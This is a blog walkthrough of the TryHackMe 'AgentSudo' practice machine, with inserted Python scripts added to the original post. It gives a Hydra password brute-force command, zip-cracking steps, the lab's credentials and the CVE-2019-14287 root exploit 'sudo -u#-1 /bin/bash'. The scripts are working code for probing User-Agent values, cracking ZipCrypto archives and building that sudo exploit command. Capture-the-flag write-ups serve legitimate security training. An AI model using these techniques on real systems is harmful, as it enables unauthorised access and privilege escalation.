AgentSudo Write-Up: TryHackMe Machine Walk-through

Saurabh Jain
5 min read · Jan 9, 2022

Machine Description: AgentSudo is a very interesting Linux-based machine that walks us through a number of cryptographic and steganographic tools and techniques. The machine was assigned a dynamic IP address, so the one you get may differ. A high-level summary of the machine is given first; I would request you to try it on your own before reading the walk-through.

High Level Summary

User Level Shell

Vulnerability Exploited: The application leaked sensitive information through several channels (a page served only for a particular User-Agent value, a weak FTP password, and data hidden inside image files), which allowed the attacker to obtain a user-level shell.

Privilege Level Shell

Vulnerability Exploited: The installed sudo was vulnerable to a security policy bypass (CVE-2019-14287): a sudoers rule that allows a command to be run as any user except root can be abused with a user ID of -1 to run it as root.

Exploit POC: https://www.exploit-db.com/exploits/47502

Proof of Concept

Initial Reconnaissance

The exhibit above shows the NMAP scan of the machine “AgentSudo”.

Service Enumeration

A web application was hosted on port 80, and on enumeration we encountered this static page.

Two things are worth noting here: “codename as user-agent” and “From, Agent R”.

On manipulating the value of the User-Agent header and substituting it with “C”, we were redirected to another page that leaks some more information.

On following the redirection we arrive at this page.

The page hints that there is a user named “chris” whose password is very easy and weak!
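The User-Agent trick above was done by hand with a single letter. As an added example (not part of the original write-up), the script below probes every single-letter codename, never follows redirects, and reports only the agents for which the server answers differently from a baseline browser User-Agent. The fake connection class, the host and the redirect target path are constructed so that it runs offline; they are not the machine's.

```python
"""Added example (not from the original write-up): enumerate which single-letter
"codename" User-Agent values make the site respond differently.  The fake
connection class, host and redirect path are constructed for offline use."""
import http.client

CODENAMES = [chr(c) for c in range(ord("A"), ord("Z") + 1)]


def probe_user_agents(host, path="/", agents=CODENAMES,
                      connect=http.client.HTTPConnection):
    """GET `path` once per codename without following redirects, and return
    {agent: (status, Location)} for every agent whose (status, Location, body)
    differs from a baseline browser User-Agent.  `connect` is the connection
    factory so a fake can be injected for testing."""
    def fetch(user_agent):
        conn = connect(host, timeout=5)
        try:
            conn.request("GET", path, headers={"User-Agent": user_agent})
            resp = conn.getresponse()
            return resp.status, resp.getheader("Location"), resp.read()
        finally:
            conn.close()

    baseline = fetch("Mozilla/5.0")
    hits = {}
    for agent in agents:
        result = fetch(agent)
        if result != baseline:
            hits[agent] = (result[0], result[1])  # a 3xx + Location is the usual tell
    return hits


# --- constructed stand-in for the target so the probe runs offline ---
class _FakeResponse:
    def __init__(self, status, location, body):
        self.status, self._location, self._body = status, location, body

    def getheader(self, name, default=None):
        if name.lower() == "location" and self._location:
            return self._location
        return default

    def read(self):
        return self._body


class FakeAgentSudoConnection:
    """Behaves like the post's target: a redirect only when User-Agent is 'C'.
    The redirect path is hypothetical, not the machine's."""
    def __init__(self, host, timeout=None):
        self._headers = {}

    def request(self, method, path, headers=None):
        self._headers = headers or {}

    def getresponse(self):
        if self._headers.get("User-Agent") == "C":
            return _FakeResponse(302, "/agent_c_page.html", b"")
        return _FakeResponse(200, None, b"Dear agents, use your own codename as user-agent")

    def close(self):
        pass


if __name__ == "__main__":
    # Against a live host you would drop the connect= argument.
    print(probe_user_agents("10.10.10.10", connect=FakeAgentSudoConnection))
```

Diffing against a baseline rather than looking only for 3xx codes also catches servers that change the body or status without redirecting.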

Now we try to brute-force the FTP service for the user chris using Hydra.

hydra -l chris -P /usr/share/wordlists/rockyou.txt ftp://<IP>

username: chris ; password: crystal

We successfully logged into FTP using the above credentials.

A few interesting files were found on the FTP server, and we downloaded them using the get command.

get <file-name>

Contents of To_agentJ.txt

Dear agent J,
All these alien like photos are fake! Agent R stored the real picture inside your directory. Your login password is somehow stored in the fake picture. It shouldn't be a problem for you.
From,
Agent C.

This letter was written by Agent C to Agent J about J's login password. It says that the alien pictures are fake, that the real picture was stored in Agent J's home directory, and that the login password is hidden inside the fake picture.

Now we use some tools to look for information hidden inside the pictures.

Information extracted using binwalk.

We can see that a ZIP archive was embedded in the image cutie.png and that its contents are encrypted. After extraction we can see the file.

Contents of the extract

The file 8702.zip is password-protected, and we will try to crack the password using John the Ripper.

zip2john 8702.zip > output.txt

Now we try to crack the hash.

john output.txt

Now we have the password to open the 8702.zip file.

7z e 8702.zip

The extracted archive contains the file To_agentR.txt.

Content of file To_agentR.txt

The text is base64 encoded. Decoding it gives us the password used in the next step.

We use the steghide tool to retrieve the information hidden in “cute-alien.jpg”, supplying the decoded password as the passphrase.
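The chain just described (binwalk carving the appended archive, zip2john/john cracking it, 7z extracting the note, base64 decoding it) is reproduced below in plain Python as an added example; it is not code from the original write-up and it runs offline. The image bytes, the archive entry, the zip password, the stand-in wordlist and the base64 note are all constructed for the demo and are not the ones on the AgentSudo machine; the steghide step is not reproduced.

```python
"""Added example, not from the write-up: carve -> crack -> decode in Python.
Image, archive, password, wordlist and note are constructed for this demo."""
import base64
import io
import struct
import zipfile
import zlib

# --- ZipCrypto (traditional PKWARE encryption): the scheme zip2john extracts ---
_CRCTAB = []
for _i in range(256):
    _c = _i
    for _ in range(8):
        _c = (_c >> 1) ^ 0xEDB88320 if _c & 1 else _c >> 1
    _CRCTAB.append(_c)


def zipcrypto_encrypt(pwd: bytes, plain: bytes) -> bytes:
    """Encrypt one stream with the ZipCrypto keystream derived from pwd."""
    keys = [0x12345678, 0x23456789, 0x34567890]

    def crc_byte(crc, b):
        return (crc >> 8) ^ _CRCTAB[(crc ^ b) & 0xFF]

    def update(b):
        keys[0] = crc_byte(keys[0], b)
        keys[1] = ((keys[1] + (keys[0] & 0xFF)) * 134775813 + 1) & 0xFFFFFFFF
        keys[2] = crc_byte(keys[2], keys[1] >> 24)

    for b in pwd:
        update(b)
    out = bytearray()
    for p in plain:
        k = keys[2] | 2
        out.append(p ^ (((k * (k ^ 1)) >> 8) & 0xFF))
        update(p)  # the key schedule advances on the plaintext byte
    return bytes(out)


def build_encrypted_zip(name: bytes, content: bytes, pwd: bytes) -> bytes:
    """Hand-build a one-entry, stored, ZipCrypto-protected archive (the stdlib
    reads encrypted zips but cannot write them)."""
    crc = zlib.crc32(content) & 0xFFFFFFFF
    # 12-byte encryption header: 11 filler bytes plus the CRC's top byte, the
    # cheap check readers use to reject most wrong passwords before the CRC.
    enc = zipcrypto_encrypt(pwd, bytes(11) + bytes([crc >> 24]) + content)
    flag, method, dostime, dosdate = 0x0001, 0, 0, 0x0021  # bit 0 = encrypted
    sizes = (crc, len(enc), len(content), len(name), 0)
    local = struct.pack("<4s2B4HL2L2H", b"PK\x03\x04", 20, 0, flag, method,
                        dostime, dosdate, *sizes) + name
    central = struct.pack("<4s4B4HL2L5H2L", b"PK\x01\x02", 20, 0, 20, 0, flag,
                          method, dostime, dosdate, *sizes, 0, 0, 0, 0, 0) + name
    end = struct.pack("<4s4H2LH", b"PK\x05\x06", 0, 0, 1, 1, len(central),
                      len(local) + len(enc), 0)
    return local + enc + central + end


def carve_zip(blob: bytes):
    """What binwalk's extraction did for cutie.png: cut out an archive appended
    to another file, from its first local-file header to the end of the EOCD."""
    start = blob.find(b"PK\x03\x04")
    eocd = blob.rfind(b"PK\x05\x06")
    if start < 0 or eocd < start:
        return None
    comment_len = struct.unpack_from("<H", blob, eocd + 20)[0]
    return blob[start:eocd + 22 + comment_len]


def crack_zip(zip_bytes: bytes, name: str, wordlist):
    """Try each candidate the way john does against zip2john's hash, here by
    attempting the real decrypt; return (password, plaintext) or None."""
    zf = zipfile.ZipFile(io.BytesIO(zip_bytes))
    if not zf.getinfo(name).flag_bits & 0x1:
        return "", zf.read(name)  # not encrypted at all
    for cand in wordlist:
        try:
            return cand, zf.read(name, pwd=cand.encode())
        except (RuntimeError, zipfile.BadZipFile):
            continue  # check-byte mismatch, or (1 in 256) a CRC mismatch
    return None


WORDLIST = ["123456", "password", "alien", "crystal", "s3cret-zip"]  # stands in for rockyou.txt


def make_sample_image() -> bytes:
    """Constructed stand-in for cutie.png: PNG signature, filler, then the
    archive appended after the image data."""
    note = base64.b64encode(b"example-passphrase")  # constructed, not the real note
    archive = build_encrypted_zip(b"To_agentR.txt", note, b"s3cret-zip")
    return b"\x89PNG\r\n\x1a\n" + b"\x00" * 64 + archive


def recover_from_image(image: bytes, wordlist):
    """Full chain: carve the zip, crack it, base64-decode the note it holds.
    Returns (zip_password, decoded_note) or None."""
    inner = carve_zip(image)
    hit = crack_zip(inner, "To_agentR.txt", wordlist) if inner else None
    if hit is None:
        return None
    zip_pwd, note = hit
    return zip_pwd, base64.b64decode(note).decode()


if __name__ == "__main__":
    print(recover_from_image(make_sample_image(), WORDLIST))
```

The check byte is why john can test ZipCrypto candidates so quickly: 255 of 256 wrong passwords are rejected after decrypting 12 bytes, and only the rare survivor has to be verified against the CRC of the whole entry.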

Initial Foothold

Reading the extracted message.txt

username : james ; password : hackerrules!

Log in to SSH with the provided username and password.

Privilege Level Shell

Exploitation

The command sudo -l lists the user's sudo privileges: which commands they may run with superuser access, and as which users.

On running it we realised that the sudo configuration was misconfigured and that the installed sudo was vulnerable to the sudo security policy bypass (CVE-2019-14287).

Exploit POC: https://www.exploit-db.com/exploits/47502

EXPLOIT: 

sudo -u#-1 /bin/bash

We got root access directly after entering the command in the terminal.
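As an added example (not code from the original write-up), the script below turns the check above into something repeatable: it parses `sudo -l` output for the rule shape the bug needs (a command allowed as ALL users except root) and `sudo -V` for a version older than 1.8.28, the release that fixed CVE-2019-14287. The sample sudo output is constructed for the demo, not captured from the AgentSudo machine.

```python
"""Added example, not from the write-up: decide from `sudo -l` and `sudo -V`
text whether a host is exposed to CVE-2019-14287 (sudo -u#-1, Exploit-DB 47502).
The sample output below is constructed, not captured from the machine."""
import re

SAMPLE_SUDO_L = """Matching Defaults entries for james on agent-sudo:
    env_reset, mail_badpass

User james may run the following commands on agent-sudo:
    (ALL, !root) /bin/bash
"""
SAMPLE_SUDO_V = "Sudo version 1.8.21p2\nSudoers policy plugin version 1.8.21p2\n"

FIXED_IN = (1, 8, 28)  # sudo 1.8.28 started rejecting uid -1 / 4294967295

# "(runas_user[:runas_group]) [TAG: ...] command" lines printed by `sudo -l`
RULE_RE = re.compile(r"^\s*\((?P<runas>[^)]*)\)\s*(?P<tags>(?:[A-Z]+:\s*)*)(?P<cmd>\S.*)$")


def parse_rules(sudo_l_output):
    """Yield (runas_users, command) for each command rule in `sudo -l` text."""
    for line in sudo_l_output.splitlines():
        m = RULE_RE.match(line)
        if m:
            users = [u.strip() for u in m.group("runas").split(":")[0].split(",")]
            yield users, m.group("cmd").strip()


def exploitable_rules(sudo_l_output):
    """Commands allowed as ALL users except root.  That exclusion is what the
    bug sidesteps: uid -1 is not 'root' to the policy check, but setresuid()
    treats -1 as 'leave unchanged', so the setuid-root process keeps uid 0."""
    return [cmd for users, cmd in parse_rules(sudo_l_output)
            if "ALL" in users and "!root" in users]


def sudo_version(sudo_v_output):
    """(major, minor, patch) from the first line of `sudo -V`; a 'p2' suffix is ignored."""
    m = re.search(r"^Sudo version (\d+)\.(\d+)\.(\d+)", sudo_v_output, re.M)
    return tuple(int(x) for x in m.groups()) if m else None


def is_vulnerable(sudo_l_output, sudo_v_output):
    """True only when both the rule shape and an unfixed version are present."""
    ver = sudo_version(sudo_v_output)
    return bool(ver and ver < FIXED_IN and exploitable_rules(sudo_l_output))


def exploit_commands(sudo_l_output):
    """The command the post runs, one per matching rule (built, not executed)."""
    return [f"sudo -u#-1 {cmd}" for cmd in exploitable_rules(sudo_l_output)]


if __name__ == "__main__":
    # On a live host, feed in subprocess output of `sudo -l` and `sudo -V` instead.
    if is_vulnerable(SAMPLE_SUDO_L, SAMPLE_SUDO_V):
        print("exposed:", *exploit_commands(SAMPLE_SUDO_L))
    else:
        print("not exposed")
```

Both conditions are required: a rule such as (ALL) NOPASSWD: /bin/bash is already root without any bug, and a patched sudo rejects the -1 user ID even when the (ALL, !root) rule is present.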

Thank you and wish you Happy Hacking!
